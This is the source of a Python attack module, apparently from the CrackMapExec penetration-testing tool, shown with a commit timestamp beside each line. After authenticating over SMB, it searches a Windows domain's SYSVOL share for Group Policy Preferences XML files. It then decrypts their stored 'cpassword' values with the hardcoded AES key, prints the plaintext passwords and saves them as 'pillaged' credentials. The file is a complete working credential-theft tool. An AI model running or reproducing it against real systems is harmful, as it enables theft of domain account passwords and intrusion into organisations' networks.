2022-07-18 23:59:14 +00:00
|
|
|
#!/usr/bin/env python3
|
|
|
|
# -*- coding: utf-8 -*-
|
|
|
|
|
2017-05-05 01:13:11 +00:00
|
|
|
import xml.etree.ElementTree as ET
|
2019-03-14 03:51:25 +00:00
|
|
|
from Cryptodome.Cipher import AES
|
2017-04-05 15:07:00 +00:00
|
|
|
from base64 import b64decode
|
|
|
|
from binascii import unhexlify
|
2020-04-22 14:33:03 +00:00
|
|
|
from io import BytesIO
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
class CMEModule:
|
|
|
|
'''
|
|
|
|
Reference: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
|
|
|
|
Module by @byt3bl33d3r
|
|
|
|
'''
|
|
|
|
|
2017-04-07 04:34:30 +00:00
|
|
|
name = 'gpp_password'
|
2017-04-05 15:07:00 +00:00
|
|
|
description = 'Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.'
|
|
|
|
supported_protocols = ['smb']
|
|
|
|
opsec_safe = True
|
|
|
|
multiple_hosts = True
|
|
|
|
|
|
|
|
def options(self, context, module_options):
|
|
|
|
'''
|
|
|
|
'''
|
|
|
|
|
|
|
|
def on_login(self, context, connection):
|
|
|
|
shares = connection.shares()
|
|
|
|
for share in shares:
|
|
|
|
if share['name'] == 'SYSVOL' and 'READ' in share['access']:
|
|
|
|
|
2017-05-08 03:16:18 +00:00
|
|
|
context.log.success('Found SYSVOL share')
|
|
|
|
context.log.info('Searching for potential XML files containing passwords')
|
|
|
|
|
2017-04-07 04:34:30 +00:00
|
|
|
paths = connection.spider('SYSVOL', pattern=['Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml'])
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
for path in paths:
|
2017-05-08 03:16:18 +00:00
|
|
|
context.log.info('Found {}'.format(path))
|
|
|
|
|
2020-04-22 14:33:03 +00:00
|
|
|
buf = BytesIO()
|
2017-04-05 15:07:00 +00:00
|
|
|
connection.conn.getFile('SYSVOL', path, buf.write)
|
|
|
|
xml = ET.fromstring(buf.getvalue())
|
2022-07-21 12:43:30 +00:00
|
|
|
sections = []
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
if 'Groups.xml' in path:
|
2022-07-21 12:43:30 +00:00
|
|
|
sections.append('./User/Properties')
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
elif 'Services.xml' in path:
|
2022-07-21 12:43:30 +00:00
|
|
|
sections.append('./NTService/Properties')
|
2017-04-05 15:07:00 +00:00
|
|
|
|
2020-08-27 02:47:43 +00:00
|
|
|
elif 'ScheduledTasks.xml' in path:
|
2022-07-21 12:43:30 +00:00
|
|
|
sections.append('./Task/Properties')
|
|
|
|
sections.append('./ImmediateTask/Properties')
|
|
|
|
sections.append('./ImmediateTaskV2/Properties')
|
|
|
|
sections.append('./TaskV2/Properties')
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
elif 'DataSources.xml' in path:
|
2022-07-21 12:43:30 +00:00
|
|
|
sections.append('./DataSource/Properties')
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
elif 'Printers.xml' in path:
|
2022-07-21 12:43:30 +00:00
|
|
|
sections.append('./SharedPrinter/Properties')
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
elif 'Drives.xml' in path:
|
2022-07-21 12:43:30 +00:00
|
|
|
sections.append('./Drive/Properties')
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
|
2022-07-21 12:43:30 +00:00
|
|
|
for section in sections:
|
|
|
|
xml_section = xml.findall(section)
|
|
|
|
for attr in xml_section:
|
|
|
|
props = attr.attrib
|
2017-04-05 15:07:00 +00:00
|
|
|
|
2022-07-21 12:43:30 +00:00
|
|
|
if 'cpassword' in props:
|
|
|
|
for user_tag in ['userName', 'accountName', 'runAs', 'username']:
|
|
|
|
if user_tag in props:
|
|
|
|
username = props[user_tag]
|
2017-04-05 15:07:00 +00:00
|
|
|
|
2022-07-21 12:43:30 +00:00
|
|
|
password = self.decrypt_cpassword(props['cpassword'])
|
2017-04-05 15:07:00 +00:00
|
|
|
|
2022-07-21 12:43:30 +00:00
|
|
|
context.log.success('Found credentials in {}'.format(path))
|
|
|
|
context.log.highlight('Password: {}'.format(password))
|
|
|
|
for k,v in props.items():
|
|
|
|
if k != 'cpassword':
|
|
|
|
context.log.highlight('{}: {}'.format(k, v))
|
2017-04-05 15:07:00 +00:00
|
|
|
|
2022-07-21 12:43:30 +00:00
|
|
|
hostid = context.db.get_computers(connection.host)[0][0]
|
|
|
|
context.db.add_credential('plaintext', '', username, password, pillaged_from=hostid)
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
def decrypt_cpassword(self, cpassword):
|
|
|
|
|
2020-04-22 10:43:17 +00:00
|
|
|
#Stolen from hhttps://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385
|
2017-04-05 15:07:00 +00:00
|
|
|
|
|
|
|
# From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
|
|
|
|
key = unhexlify('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b')
|
2020-04-22 10:43:17 +00:00
|
|
|
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
|
|
|
|
password = b64decode(cpassword)
|
|
|
|
IV = "\x00" * 16
|
|
|
|
decypted = AES.new(key, AES.MODE_CBC, IV.encode("utf8")).decrypt(password)
|
2020-08-27 02:47:43 +00:00
|
|
|
return decypted.decode().rstrip()
|